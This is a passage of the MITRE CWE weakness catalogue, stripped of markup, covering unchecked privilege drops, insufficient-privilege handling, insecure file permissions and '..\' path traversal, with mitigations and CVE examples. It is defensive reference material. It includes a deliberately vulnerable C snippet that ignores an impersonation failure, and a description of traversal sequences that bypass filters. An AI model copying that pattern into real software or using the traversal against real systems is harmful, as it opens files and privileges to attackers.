has completed, the program should drop root privilege and return to the privilege level of the invoking user. + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-10-14 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-12-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Common_Consequences, Demonstrative_Examples, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product attempts to drop privileges but does not check or incorrectly checks to see if the drop succeeded. + If the drop fails, the product will continue to run with the raised privileges, which might provide additional access to unprivileged users. + + + + + + + + + Primary + + + + + + + In Windows based environments that have access control, impersonation is used so that access checks can be performed on a client identity by a server with higher privileges. By impersonating the client, the server is restricted to client-level security -- although in different threads it may have much higher privileges. + + + + Implementation + + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + This issue is likely to occur in restrictive environments in which the operating system or application provides fine-grained control over privilege management. + + + + Medium + + + Access Control + Gain Privileges or Assume Identity + If privileges are not dropped, neither are access rights of the user. Often these rights can be prevented from being dropped. + + + Access Control + Non-Repudiation + Gain Privileges or Assume Identity + Hide Activities + If privileges are not dropped, in some cases the system may record actions as the user which is being impersonated rather than the impersonator. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Separation of Privilege + + Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. + Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. + + + + Implementation + Check the results of all functions that return a value and verify that the value is expected. + High + Checking the return value of the function will typically be sufficient, however beware of race conditions (CWE-362) in a concurrent environment. + + + Implementation + In Windows, make sure that the process token has the SeImpersonatePrivilege(Microsoft Server 2003). Code that relies on impersonation for security must ensure that the impersonation succeeded, i.e., that a proper privilege demotion happened. + + + + + This code attempts to take on the privileges of a user before creating a file, thus avoiding performing the action with unnecessarily high privileges: + + bool DoSecureStuff(HANDLE hPipe) {bool fDataWritten = false;ImpersonateNamedPipeClient(hPipe);HANDLE hFile = CreateFile(...);/../RevertToSelf()/../} + + The call to ImpersonateNamedPipeClient may fail, but the return value is not checked. If the call fails, the code may execute with higher privileges than intended. In this case, an attacker could exploit this behavior to write a file to a location that the attacker does not have access to. + + + + + CVE-2006-4447 + Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail. + https://www.cve.org/CVERecord?id=CVE-2006-4447 + + + CVE-2006-2916 + Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail. + https://www.cve.org/CVERecord?id=CVE-2006-2916 + + + + System Process + + + + Failure to check whether privileges were dropped successfully + + + POS37-C + Ensure that privilege relinquishment is successful + Exact + + + SFP4 + Unchecked Status Condition + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Description, Modes_of_Introduction, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Background_Details, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2020-12-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Failure to Check Whether Privileges Were Dropped Successfully + Improper Check for Successfully Dropped Privileges + + + + The product does not handle or incorrectly handles when it has insufficient privileges to perform an operation, leading to resultant weaknesses. + + + + + + + + + Primary + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Operation + + + + + Other + Other + Alter Execution Logic + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + CVE-2001-1564 + System limits are not properly enforced after privileges are dropped. + https://www.cve.org/CVERecord?id=CVE-2001-1564 + + + CVE-2005-3286 + Firewall crashes when it can't read a critical memory block that was protected by a malicious process. + https://www.cve.org/CVERecord?id=CVE-2005-3286 + + + CVE-2005-1641 + Does not give admin sufficient privileges to overcome otherwise legitimate user actions. + https://www.cve.org/CVERecord?id=CVE-2005-1641 + + + + + Insufficient privileges + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + CWE-280 and CWE-274 are too similar. It is likely that CWE-274 will be deprecated in the future. + Overlaps dropped privileges, insufficient permissions. + This has a layering relationship with Unchecked Error Condition and Unchecked Return Value. + Within the context of vulnerability theory, privileges and permissions are two sides of the same coin. Privileges are associated with actors, and permissions are associated with resources. To perform access control, at some point the product makes a decision about whether the actor (and the privileges that have been assigned to that actor) is allowed to access the resource (based on the permissions that have been specified for that resource). + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-03-10 + updated Maintenance_Notes, Theoretical_Notes + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationship_Notes, Theoretical_Notes + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Relationships, Theoretical_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Insufficient Privileges + Failure to Handle Insufficient Privileges + + + + During installation, installed file permissions are set to allow anyone to modify those files. + + + + + + + Primary + + + + + + + + + + Architecture and Design + + + Implementation + + + Installation + + + Operation + + + Medium + + + Confidentiality + Integrity + Read Application Data + Modify Application Data + + + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Inter-application Flow Analysis + + + + SOAR Partial + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria + Web Application Scanner + Web Services Scanner + Database Scanners + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Host Application Interface Scanner + + Cost effective for partial coverage: + + Fuzz Tester + Framework-based Fuzzer + Automated Monitored Execution + Forced Path Execution + + + + High + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Manual Source Code Review (not inspections) + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Context-configured Source Code Weakness Analyzer + + + + SOAR Partial + + + Automated Static Analysis + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Configuration Checker + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Architecture and Design + Operation + The architecture needs to access and modification attributes for files to only those users who actually require those actions. + + + Architecture and Design + Separation of Privilege + + Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. + Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. + + + + + + CVE-2005-1941 + Executables installed world-writable. + https://www.cve.org/CVERecord?id=CVE-2005-1941 + + + CVE-2002-1713 + Home directories installed world-readable. + https://www.cve.org/CVERecord?id=CVE-2002-1713 + + + CVE-2001-1550 + World-writable log files allow information loss; world-readable file has cleartext passwords. + https://www.cve.org/CVERecord?id=CVE-2001-1550 + + + CVE-2002-1711 + World-readable directory. + https://www.cve.org/CVERecord?id=CVE-2002-1711 + + + CVE-2002-1844 + Windows product uses insecure permissions when installing on Solaris (genesis: port error). + https://www.cve.org/CVERecord?id=CVE-2002-1844 + + + CVE-2001-0497 + Insecure permissions for a shared secret key file. Overlaps cryptographic problem. + https://www.cve.org/CVERecord?id=CVE-2001-0497 + + + CVE-1999-0426 + Default permissions of a device allow IP spoofing. + https://www.cve.org/CVERecord?id=CVE-1999-0426 + + + + + Insecure Default Permissions + + + FIO06-C + Create files with appropriate access permissions + + + FIO01-J + Create files with appropriate access permission + + + Part 2-4 + Req SP.03.08 + + + Part 4-2 + Req CR 2.1 + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Description, Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Description, Modes_of_Introduction, Potential_Mitigations + + + CWE Content Team + MITRE + 2020-12-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-25 + Suggested mappings to ISA/IEC 62443. + + Insecure Default Permissions + + + + A product defines a set of insecure permissions that are inherited by objects that are created by the program. + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Operation + + + + + Confidentiality + Integrity + Read Application Data + Modify Application Data + + + + + Architecture and Design + Operation + Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. + + + Architecture and Design + Separation of Privilege + + Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. + Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. + + + + + + CVE-2005-1841 + User's umask is used when creating temp files. + https://www.cve.org/CVERecord?id=CVE-2005-1841 + + + CVE-2002-1786 + Insecure umask for core dumps [is the umask preserved or assigned?]. + https://www.cve.org/CVERecord?id=CVE-2002-1786 + + + + + Insecure inherited permissions + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A product inherits a set of insecure permissions for an object, e.g. when copying from an archive file, without user awareness or involvement. + + + + + + + + + Architecture and Design + + + Operation + + + + + Confidentiality + Integrity + Read Application Data + Modify Application Data + + + + + Architecture and Design + Operation + Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. + + + Architecture and Design + Separation of Privilege + + Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. + Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. + + + + + + CVE-2005-1724 + Does not obey specified permissions when exporting. + https://www.cve.org/CVERecord?id=CVE-2005-1724 + + + + + Insecure preserved inherited permissions + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-12-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + While it is executing, the product sets the permissions of an object in a way that violates the intended permissions that have been specified by the user. + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Architecture and Design + + + Operation + + + + + Confidentiality + Integrity + Read Application Data + Modify Application Data + + + + + Architecture and Design + Operation + Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. + + + Architecture and Design + Separation of Privilege + + Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. + Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. + + + + + + CVE-2002-0265 + Log files opened read/write. + https://www.cve.org/CVERecord?id=CVE-2002-0265 + + + CVE-2003-0876 + Log files opened read/write. + https://www.cve.org/CVERecord?id=CVE-2003-0876 + + + CVE-2002-1694 + Log files opened read/write. + https://www.cve.org/CVERecord?id=CVE-2002-1694 + + + + + Insecure execution-assigned permissions + + + FIO06-C + Create files with appropriate access permissions + + + FIO01-J + Create files with appropriate access permission + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-12-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Insecure Execution-assigned Permissions + + + + The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize "..\" sequences that can resolve to a location that is outside of that directory. + + This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. + The '..\' manipulation is the canonical manipulation for operating systems that use "\" as directory separators, such as Windows. However, it is also useful for bypassing path traversal protection schemes that only assume that the "/" separator is valid. + + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. + Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2002-0661 + "\" not in denylist for web server, allowing path traversal attacks when the server is run in Windows and other OSes. + https://www.cve.org/CVERecord?id=CVE-2002-0661 + + + CVE-2002-0946 + Arbitrary files may be read files via ..\ (dot dot) sequences in an HTTP request. + https://www.cve.org/CVERecord?id=CVE-2002-0946 + + + CVE-2002-1042 + Directory traversal vulnerability in search engine for web server allows remote attackers to read arbitrary files via "..\" sequences in queries. + https://www.cve.org/CVERecord?id=CVE-2002-1042 + + + CVE-2002-1209 + Directory traversal vulnerability in FTP server allows remote attackers to read arbitrary files via "..\" sequences in a GET request. + https://www.cve.org/CVERecord?id=CVE-2002-1209 + + + CVE-2002-1178 + Directory traversal vulnerability in servlet allows remote attackers to execute arbitrary commands via "..\" sequences in an HTTP request. + https://www.cve.org/CVERecord?id=CVE-2002-1178 + + + + + '..\filename' ('dot dot backslash') + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Applicable_Platforms, Description, Name + + + CWE Content Team + MITRE + 2008-11-24 + updated Observed_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Observed_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Dot Dot Backslash - '..\filename' + Path Traversal: '..\filename' + + + + The product does not handle or incorrectly handles when it has insufficient privileges to access resources or functionality as specified by their permissions. This may cause it to follow unexpected code paths that may leave the product in an invalid state. + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Other + Other + Alter Execution Logic + + + + + Architecture and Design + Separation of Privilege + + Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. + Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. + + + + Implementation + Always check to see if you have successfully accessed a resource or system functionality, and use proper error handling if it is unsuccessful. Do this even when you are operating in a highly privileged mode, because errors or environmental conditions might still cause a failure. For example, environments with highly granular permissions/privilege models, such as Windows or Linux capabilities, can cause unexpected failures. + + + + + CVE-2003-0501 + Special file system allows attackers to prevent ownership/permission change of certain entries by opening the entries before calling a setuid program. + https://www.cve.org/CVERecord?id=CVE-2003-0501 + + + CVE-2004-0148 + FTP server places a user in the root directory when the user's permissions prevent access to the their own home directory. + https://www.cve.org/CVERecord?id=CVE-2004-0148 + + + + + Fails poorly due to insufficient permissions + + + 17 + Improper Filesystem Permissions + + + SFP4 + Unchecked Status Condition + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + CWE-280 and CWE-274 are too similar. It is likely that CWE-274 will be deprecated in the future. + This can be both primary and resultant. When primary, it can expose a variety of weaknesses because a resource might not have the expected state, and subsequent operations might fail. It is often resultant from Unchecked Error Condition (CWE-391). + Within the context of vulnerability theory, privileges and permissions are two sides of the same coin. Privileges are associated with actors, and permissions are associated with resources. To perform access control, at some point the software makes a decision about whether the actor (and the privileges that have been assigned to that actor) is allowed to access the resource (based on the permissions that have been specified for that resource). + This type of issue is under-studied, since researchers often concentrate on whether an object has too many permissions, instead of not enough. These weaknesses are likely to appear in environments with fine-grained models for permissions and privileges, which can include operating systems and other large-scale software packages. However, even highly simplistic permission/privilege models are likely to contain these issues if the developer has not considered the possibility of access failure. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name, Theoretical_Notes + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + 